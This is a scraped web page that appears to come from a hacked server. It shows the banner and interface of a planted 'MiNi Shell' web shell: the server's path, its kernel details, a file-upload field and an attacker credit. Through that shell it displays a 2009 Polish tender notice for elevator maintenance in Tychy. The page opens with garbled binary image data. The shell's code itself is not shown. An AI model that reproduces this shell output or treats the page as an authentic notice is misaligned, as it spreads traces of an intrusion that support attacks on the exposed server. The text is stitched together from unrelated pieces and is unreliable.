JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090527/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090527/80925-N-2009.html

<p class="kh_header"><b>Tychy: Bieżąca konserwacja i naprawy dźwigów osobowych w budynkach 
       mieszkalnych i niemieszkalnych administrowanych przez ROM Nr I ÷ V 
       w Tychach.</b><br>
<b>Numer ogłoszenia: 80925 - 2009; data zamieszczenia: 27.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.umtychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżąca konserwacja i naprawy dźwigów osobowych w budynkach 
       mieszkalnych i niemieszkalnych administrowanych przez ROM Nr I ÷ V 
       w Tychach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia są usługi w zakresie technicznego utrzymania urządzeń
        dźwigowych, polegającym na prowadzeniu bieżącej konserwacji, usuwaniu awarii wraz ze
        świadczeniem czynności pogotowia technicznego oraz wykonywaniu napraw w zakresie
        wykraczającym poza czynności konserwacyjne w budynkach mieszkalnych  
        i niemieszkalnych, administrowanych przez ROM Nr  I ÷ V w Tychach, z podziałem 
        na 2 części zwane dalej zadaniami.
           
        ZADANIE Nr 1 - Bieżąca konserwacja i naprawy dźwigów osobowych w budynkach 
                                  mieszkalnych i niemieszkalnych administrowanych przez  ROM Nr  I ÷ V 
                                  w Tychach
        ZADANIE Nr 2 - Bieżąca konserwacja i naprawy dźwigu osobowego i osobowo-
                                  towarowego w budynku użyteczności publicznej BALBINA CENTRUM
                                  położonego w Tychach przy ulicy Barona 30


         Wykaz dźwigów ich charakterystykę zawierają załączniki:
         dla Zadania Nr 1 - Załącznik Nr 1 do SIWZ.
         dla Zadania Nr 2 - Załącznik Nr 2 do SIWZ.
         
   A.  Zakres bieżącej konserwacji dla Zadania Nr 1 i Nr 1 obejmuje m.in.:
   1.  Przestrzeganie warunków wynikających z zakresu przeglądów P1 i P2 , 
         a w szczególności dbanie o:    
   1) należyty stan techniczny wszelkich mechanizmów napędowych ;
   2) należyte działanie urządzeń i układów sterowych ;
   3) należyte działanie urządzeń bezpieczeństwa, drzwi przystankowych i drzwi kabinowych ;
   4) należyte działanie urządzeń chwytających, stanu cięgien i lin nośnych, ich zamocowań 
       i elementów zawieszenia;
   5) należyte działanie wskaźników sygnalizacji i oświetlenia w kabinie dźwigu ; 
   6) smarowanie wszystkich elementów wymagających smarowania ;
   7) utrzymanie w czystości maszynowni, podszybia i dachu kabiny ; 
   8) wykonywanie wszelkich niezbędnych pomiarów elektrycznych ;
   9) wykonywanie i przestrzeganie zaleceń i nakazów wydanych przez właściwy organ Dozoru
       Technicznego ;
  10) sprawdzanie urządzeń pod kątem jakości pracy ;
  11) kontrola stanu oleju napędu ;
2.  Ponadto Wykonawca zobowiązany jest:
 1) przestrzegać instrukcji konserwacji, usuwać na bieżąco usterki i inne nieprawidłowości 
     w działaniu urządzenia oraz dokonywać przeglądów w terminach określonych w instrukcji
     eksploatacji ;
2)  prowadzić dziennik konserwacji dźwigu poprzez dokonywanie zapisów wszelkich 
     wykonywanych czynności w terminach dokonanych konserwacji oraz przygotowywania 
     dźwigów i brania czynnego udziału w czasie przeprowadzania badań zwyczajnych i 
     nadzwyczajnych określonych przez dozór techniczny ;
3)  zwracać uwagę i reagować na nieprawidłowości użytkowania urządzenia dźwigowego;
4)  powiadamiać Kierowników poszczególnych Rejonów Obsługi Mieszkańców (Rom-ów)
     o stwierdzonych przypadkach dewastacji, kradzieży lub wadliwej pracy dźwigu zwłaszcza 
    wtedy, gdy może to mieć wpływ na bezpieczeństwo eksploatacji urządzenia ;
5)  reprezentować Zamawiającego podczas kontroli przeprowadzonych przez Urząd Dozoru
     Technicznego zwany dalej UDT, służby p. poż. itd.;
6)  przestrzegać terminów badań kontrolnych i konserwacyjnych dźwigu ;
7)  wyprzedzająco informować kierowników poszczególnych ROM -ów o konieczności wykonania
     czynności zmierzających do bezawaryjnej pracy urządzenia;
3. Awarie: 
    Usuwanie awarii wraz ze świadczeniem pogotowia technicznego polegać będzie na usuwaniu 
    w sposób niezwłoczny zgłaszanych awarii. Nadto Wykonawca zobowiązany jest przyjmować
    zgłoszenia mieszkańców/użytkowników nieruchomości, w zakresie objętym przedmiotem
    zamówienia, reagować na zgłoszenie awarii do 10 minut od momentu przyjęcia zgłoszenia
    i usuwać awarie lub powiadomić kierownika danego ROM-u o konieczności wykonania 
    naprawy wykraczającej poza zakres konserwacji, w terminie nie dłuższym niż 2 godziny
    od chwili otrzymania telefonicznego zgłoszenia.
4. Naprawy:
     Naprawy to roboty wykraczające poza zakres bieżącej konserwacji.
     Konieczność wykonania czynności naprawczych dźwigu Wykonawca zgłosi do Kierownika 
     danego ROM-u i przedstawi kalkulację. 
     Przedstawiciel Rom-u  wystawi zlecenie na naprawę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> ZADANIE Nr 1 - 3 800,00 zł ( słownie: trzy tysiące osiemset złotych)
ZADANIE Nr 2 -    250,00 zł ( słownie: dwieście pięćdziesiąt złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki określone na 
      podstawie art. 22 ust.1 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych
      (tekst jednolity Dz.U. z 20 listopada 2007 r., Nr 223, poz. 1655, z późn. zm.), tj.:  
  1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy
nakładają obowiązek posiadania takich uprawnień ; 

  2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  
      i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie 
      innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
      zamówienia; 
  3)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

  4)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
       art. 24 ust. 1 i 2 ustawy
        oraz spełnią warunki określone w specyfikacji istotnych warunków zamówienia. 

2.  Sprawdzenie spełnienia warunków udziału w postępowaniu zostanie dokonane na podstawie 
     złożonego oświadczenia oraz dołączonych do oferty dokumentów wymienionych 
     poniżej, według zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Wykonawca wraz z ofertą składa następujące oświadczenia i dokumenty: 

1)  oświadczenie potwierdzające spełnienie warunku udziału w postępowaniu 
       stosownie do treści art. 44 w związku z art. 22 ust. 1 pkt. 1÷ 4  ustawy - Pzp. 
        - wzór druku oświadczenia stanowi załącznik do specyfikacji,
        (W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia                
        oświadczenie o spełnianiu warunków udziału w postępowaniu składają wszyscy Wykonawcy)
  2)  aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie do 
        ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru 
        lub zgłoszenia do ewidencji działalności gospodarcze - wystawiony  nie wcześniej 
        niż 6 miesięcy przed upływem terminu składania ofert ;   

   3)  dokument potwierdzający, że Wykonawca posiada uprawnienia Urzędu Dozoru 
        Technicznego do modernizacji dźwigów ;

 4)  aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz 
     właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
       Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem 
       podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń , 
       że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
       płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawionych 
       nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ;
                 (W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia 
        przedmiotowe dokumenty wymienione w punkcie 2) i 3) muszą być złożone dla każdego z nich).

5)  aktualną polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca
      jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
      -  o wartości ubezpieczenia nie mniejszej niż:  
      dla ZADANIA Nr 1 : 150 000,00 zł
      dla ZADANIA Nr 2 :   10 000,00 zł
     Kwotę ubezpieczenia wyrażoną w  innej walucie niż PLN ,Zamawiający przeliczy na PLN, 
     przyjmując do przeliczeń średni kurs danej waluty podany w dniu otwarcia ofert przez 
     Narodowy Bank Polski.
     (W przypadku podmiotów występujących wspólnie warunek ten Zamawiający uzna za spełniony, jeżeli  
    Wykonawcy składający ofertę wspólną będą spełniać go łącznie lub co najmniej jeden z Wykonawców)  
   
6)  wykaz wykonanych, w przypadku świadczeń okresowych lub ciągłych również 
     wykonywanych, usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o
     udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie,
     odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot, z podaniem 
     ich wartości , przedmiotu, dat wykonania i odbiorców - należy wykazać dla każdego     
     zadania co najmniej dwie usługi zrealizowane w ramach odrębnych umów, polegające 
    na wykonaniu napraw i konserwacji dźwigów o wartości każdej z tych usług nie mniejszej niż:  
         a)  82 000,00 zł ( brutto)  - dla ZADANIA Nr 1
         b)    5 000,00 zł ( brutto)   - dla ZADANIA Nr  2
  
     Do wykazu należy dołączyć dokumenty potwierdzające, że usługi te zostały 
     wykonane należycie. 

 - W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać łącznie lub 
    co najmniej jeden z Wykonawców.
 - W przypadku podmiotów występujących wspólnie warunek ten Zamawiający uzna za spełniony, jeżeli 
   Wykonawcy składający ofertę wspólną będą spełniać go łącznie lub co najmniej jeden z wykonawców.  

7)  wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą 
     uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji    
     zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także  
     zakresu wykonywanych przez nich czynności. 
W wykazie należy wskazać, że Wykonawca dysponuje lub będzie dysponował:  
   
1)  co najmniej 1 osobą posiadającą uprawnienia do prowadzenia konserwacji, eksploatacji: 
      dźwigów, dźwignic, wyciągarek, wyciągów itp.
2)  co najmniej dwoma osobami posiadającymi uprawnienia do wykonania pracy na 
      stanowisku eksploatacji urządzeń i instalacji elektroenergetycznych o napięciu 1 kV       

   Na potwierdzenie wymaganych kwalifikacji zawodowych do wykazu osób należy   
załączyć:
a)  uprawnienia do prowadzenia konserwacji, eksploatacji: dźwigów, dźwignic, wyciągarek,
     wyciągów itp.
b)  uprawnienia do wykonania pracy na stanowisku eksploatacji urządzeń i instalacji
     elektroenergetycznych o napięciu 1 kV  
   
Wykonawca, który wskaże w wykazie, osoby, którymi  b ę d z i e dysponował winien złożyć  
pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania 
zamówienia.   
- Wykaz osób należy sporządzić wg wzoru druku stanowiącego załącznik do SIWZ.
 (W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać łącznie lub co najmniej jeden z Wykonawców).  
                   

2.  Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. 
     (Dz. U. Nr 87, poz. 605, z późn. zm. ) w sprawie rodzajów dokumentów potwierdzających 
     spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich 
     może żądać Zamawiający od Wykonawcy:
1)  jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej  
     Polskiej, zamiast dokumentów, o których mowa powyżej w pkt. 1., p.pkt. 2) i 4) - składa 
     dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
     zamieszkania, potwierdzające odpowiednio, że:  
     a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
     b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i 
          zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie 
          na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
          organu;  
2)  jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub 
     miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie w pkt. 1.,
     p.pkt. 2) i 4) zastępuje się je dokumentem zawierającym oświadczenie złożone przed 
     notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu 
     zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym 
     Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - Stawka roboczogodziny kosztorysowej R-g brutto( R x Kp. x Zysk) - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.umtychy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego - pokój Nr 20 , cena 15 zł (brutto) lub za 
  zaliczeniem pocztowym. Opłata dotyczy wykonawców, którzy odbiorą SIWZ osobiście 
  lub złożą wniosek o jej przekazanie..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 11:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE Nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bieżąca konserwacja i naprawy dźwigów osobowych w budynkach 
                                  mieszkalnych i niemieszkalnych administrowanych przez  ROM Nr  I ÷ V w Tychach
Wykaz dźwigów ich charakterystykę zawiera Załącznik Nr 1 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Stawka roboczogodziny kosztorysowej:  R-g brutto( R x Kp. x Zysk) - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE Nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bieżąca konserwacja i naprawy dźwigu osobowego i osobowo-
                                  towarowego w budynku użyteczności publicznej  BALBINA CENTRUM 
                                  położonego w Tychach przy ulicy Barona 30


         Wykaz dźwigów ich charakterystykę zawiera Załącznik Nr 2 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Stawka roboczogodziny kosztorysowej R-g brutto( R x Kp. x Zysk) - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com